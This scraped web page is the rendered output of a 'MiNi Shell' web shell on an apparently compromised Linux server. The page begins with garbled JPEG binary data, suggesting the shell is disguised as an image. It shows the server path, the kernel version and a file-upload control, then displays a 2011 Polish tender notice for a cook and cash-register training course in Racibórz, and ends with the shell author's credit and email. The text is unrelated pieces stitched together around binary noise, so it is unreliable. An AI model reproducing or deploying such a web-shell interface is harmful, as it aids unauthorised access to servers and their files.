JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110505/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110505/101282-N-2011.html

<p class="kh_header"><b>Racibórz: Przeprowadzenie usługi szkoleniowej dla klientów Ośrodka Pomocy Społecznej w Raciborzu pn.Kucharz małej gastronomii z obsługą kasy fiskalnej.</b><br>
<b>Numer ogłoszenia: 101282 - 2011; data zamieszczenia: 05.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Sienkiewicza 1, 47-400 Racibórz, woj. śląskie, tel. 032 4152650, faks 032 4190659.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bipraciborz.pl/ops/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usługi szkoleniowej dla klientów Ośrodka Pomocy Społecznej w Raciborzu pn.Kucharz małej gastronomii z obsługą kasy fiskalnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przeprowadzenie usługi szkoleniowej pn. Kucharz małej gastronomii z obsługą kasy fiskalnej
2.	Szkoleniem objęte zostaną  4 osoby. 
3.	Kurs składa się z dwóch modułów:
1)	Kucharz małej gastronomi na który przypada 180 godz. w tym 130 godz.praktycznych 
2)	Obsługa kasy fiskalnej na który przypada 20 godz .
4.	Łączna liczba godzin (dydaktycznych, praktycznych i egzaminacyjnych) kursu wynosi 200 godz. zegarowych.
5.	Godzina zajęć szkoleniowych liczy 60 min.( może obejmować zajęcia edukacyjne liczące 45 min. oraz przerwę liczącą średnio 15 min.)
6.	Zajęcia szkoleniowe : 
1)	powinny odbywać się przeciętnie nie mniej niż 30 godz. zegarowych w tygodniu, od poniedziałku do piątku ( z wyłączeniem dni świątecznych) w godz. pomiędzy 8.00- 15.00, 
2)	w przypadku zajęć praktycznych dotyczących modułu kucharza zajęcia mogą odbywać się od poniedziałku do soboty, w przedziale czasowym od 6.00 - 15.00  jednak nie dłużej niż  8 godzin dziennie ,    
3)	uczestnikom przysługują 15 minutowe przerwy kawowe oraz jedna 30 min przerwa z przeznaczeniem na Catering,
4)	termin szkolenia w okresie od 1.06 -22.07.2011 z wyłączeniem dni 8-9.06, 23.06 i 13-14.07.2011  
7.	Ramowy program szkolenia musi obejmować między innymi następujące zagadnienia :
7.1Moduł kucharz małej gastronomii  
1) Teoria- Technologia gastronomiczna
a)	charakterystyka procesów technologicznych
b)	wiadomości o środkach spożywczych,
c)	zasady zdrowego żywienia,
d)	planowanie i sporządzanie zestawów codziennych i okolicznościowych,
e)	warzywa-podział, ziemniaki i grzyby skład chemiczny, obróbka cieplna, zastosowanie 
       w  produkcji gastronomicznej
f)	owoce- charakterystyka towaroznawstwa, obróbka wstępna i cieplna. potrawy i napoje 
       z owoców,
g)	mleko i przetwory mleczne i sery,
h)	jaja, ocena świeżości, właściwości i ich zastosowanie  w produkcji gastronomicznej,
i)	kasze-rodzaje, obróbka wstępna i cieplna oraz wykorzystanie w potrawach,
j)	charakterystyka ciast drożdżowych, kruchych, biszkoptowych i francuskich,
k)	mięso budowa, podział tusz, obróbka wstępna, dobór technik wykonywania potraw, asortyment potraw,  mięsna masa mielona,
l)	drób, ryby- skład chemiczny, obróbka wstępna,  asortyment potraw,
m)	zupy i sosy rodzaje, zasady sporządzania,
n)	zagadnienia  bhp i p.poż , udzielanie pomocy doraźnej ( poparzenia, skaleczenia itp.),
o)	inne zagadnienia

2) Praktyczna nauka technologii obróbki żywności 
a)	zasady higieny (mycia rąk, urządzeń ,środki do dezynfekcji)
b)	bezpieczna obsługa maszyn i urządzeń,
c)	potrawy z warzyw, z jaj i przetworów mleczarskich,
d)	zupy, sosy  w gastronomii,
e)	potrawy mączne w gastronomii,
f)	potrawy jarskie i półmięsne w gastronomii,
g)	potrawy z drobiu,z ryb,
h)	przekąski zimne i gorące,
i)	zimny bufet i napoje, 
j)	desery , ciasta
k)	inne zagadnienia.

7.2 Moduł obsługa kasy fiskalnej 
1)	omówienie podstawowych pojęć fiskalnych
2)	przeznaczenie i zastosowanie kas fiskalnych
3)	budowa i podstawowe wyposażenie kas fiskalnych
4)	podstawowe funkcje programowe
5)	ćwiczenia praktyczne na kasach fiskalnych- uruchomienie i obsługa 
6)	rozpoznanie i kontrola znaków pieniężnych,
7)	inne zagadnienia w tym temacie

8.	Wykonawca musi zapewnić:
1)	Miejsce realizacji przedmiotu zamówienia zajęcia praktyczne  i teoretyczne na terenie miasta Raciborza, 
2)	kadrę dydaktyczną posiadającą kwalifikacje zawodowe odpowiednie do prowadzonego szkolenia zgodnie z postawionym warunkiem,
3)	osoba prowadząca zajęcia praktyczne musi poświęcać cały czas osobom uczestniczącym w zajęciach praktycznych, 
4)	salę do prowadzenia zajęć teoretycznych wyposażoną: w stoliki, krzesła (w ilości odpowiadającej ilości uczestników szkolenia),
5)	sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia np. tablica suchościerne, rzutnik multimedialny, 
6)	pomieszczenia do zajęć praktycznych muszą być wyposażone w podstawowy sprzęt gastronomiczny oraz spełniać wymogi sanitarno-epidemiologiczne. Każdy uczestnik powinien mieć dostęp do samodzielnego stanowiska pracy, 
7)	każdemu uczestnikowi skryp zawierający podstawowe informacje w każdym z poruszanych tematów programu szkolenia,  podręcznik - o tematyce kucharskiej, 
8)	pomieszczenie socjalne do spożywania posiłków,
9)	odzież ( 2 szt) i obuwie robocze, czepek na głowę,
10)	warunki szkolenia zgodne z przepisami bhp i p.poż, 
11)	w przerwie kawowej: kawę, herbatę, zimne napoje, mleczko/śmietankę  do kawy, cukier , owoc lub jogurt,
12)	w przerwie obiadowej gorący posiłek (drugie danie) każdego dnia inny, może powtarzać się dekadowo (podawany w opakowaniach termoizolacyjnych jednorazowego użytku wraz ze sztućcami jednorazowego użytku dot. zajęć teoretycznych), 
13)	wyrobić książeczkę dla celów sanitarno-epidemiologicznych dla uczestników szkolenia,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniowy, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał min.1 usługi polegającą na prowadzeniu szkolenia z zakresu kucharza i min. 1 na prowadzeniu usługi szkoleniowej z zakresu obsługi kas fiskalnych, albo min.1 szkolenie jeżeli wykazane szkolenie zawiera moduły tz. Kucharz i obsługę kasy fiskalnej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca wykaże 
1.Modułu kucharz:
1) min.1 osobę do prowadzenia  zajęć teoretycznych, która posiada min. średnie wykształcenie o kierunku gastronomicznym lub nauczyciel praktycznej nauki zawodu w kierunku gastronomicznym oraz min. 3 letnie doświadczenie zawodowe, 
 2) min.1 osobę do prowadzenia zajęć praktycznych, która posiada: 
 min. średnie  wykształcenie o  kierunku kucharz lub gastronomicznym 
 i min. 3 letnie doświadczenie  w zawodzie kucharz,
    2.Moduł  obsługa kas fiskalnych 
1)min.1 osobę do prowadzenia zajęć teoretycznych posiadającą :
- min. średnie  wykształcenie i przeprowadzone min. 1 szkolenie w tematyce obsługa kasy fiskalnej,
2) min. 1 osobę do prowadzenia zajęć  praktycznych, posiadającą: 
- min. średnie  wykształcenie i przeprowadzone min.1 szkolenie z zakresu obsługi kas fiskalnych, 
            Lub
3)min.1 osobę do prowadzenia całości zajęć teoretycznych i praktycznych, posiadającą:
- min. średnie  wykształcenie i przeprowadzone min.1 szkolenie z zakresu obsługi kas fiskalnych,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony i podpisany Formularz ofertowy ( Załącznik Nr1 do SIWZ)
	Oraz -jeżeli dotyczą:
2)Dokument/y stwierdzające ustanowienie pełnomocnika zgodnie z art.23 ust.2 ustawy Prawo zamówień publicznych, w przypadku gdy o udzielenie niniejszego zamówienia Wykonawcy ubiegają się wspólnie - oryginał lub kopia poświadczenia za zgodność z oryginałem przez notariusza,
3)pełnomocnictwo do działania w imieniu Wykonawcy, jeżeli do reprezentowania Wykonawcy wskazano inną osobę niż upoważniona z mocy prawa- oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza lub innego dokumentu, z którego wynika upoważnienie do reprezentowania Wykonawcy 
4)pisemne zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
  ( treść dokumentu musi zawierać między innymi następujące informacje kto udziela, komu udziela, jakie zasoby udziela, tytuł prawny pod jakim potencjał zostanie udostępniony, wskazanie okresu na jaki zostaną udostępnione zasoby)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający zastrzega sobie prawo dokonywania zmian w postanowieniach zawartej umowy dotyczącej:
1)	zmiany jednorazowo lub na stałe osoby szkolącej-wykładowcy w przypadku chorobowego lub zaistniałej sytuacji losowej (wykonawca składa oświadczenie ) - zmiana osoby na inną może być dokonana tylko na takich warunkach jakie zostały postawione w postępowaniu przetargowym, do aneksu należy przedłożyć stosowne dokumenty, 
2)	w przypadku rezygnacji lub utraty uprawnień do  korzystania z projektu przez uczestnika Zamawiający w jego miejsce może wprowadzić nową osobę
3)	w przypadku braku nowej osoby o której mowa w pkt.3 p.pkt 2 przed rozpoczęciem szkolenia ilość  uczestników ulegnie zmniejszeniu,
4)	zmiany miejsca szkolenia tylko w przypadkach losowych na takich samych warunkach jak zostały opisane w wymaganiach  w SIWZ,
5)	powyższe zmiany do umowy będą wprowadzane aneksem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bipraciborz.pl/ops/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej ul.Sienkiewicza 1 47-400 Racibórz II piętro pokój nr8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2011 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej ul.Sienkiewicza 1, 47-400 Racibórz,  I piętro sekretariat ..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projektu aktywizacji i integracji zawodowej osób bezrobotnych w Raciborzu DROGA do PRACY współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1 Poddziałania 7.11 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com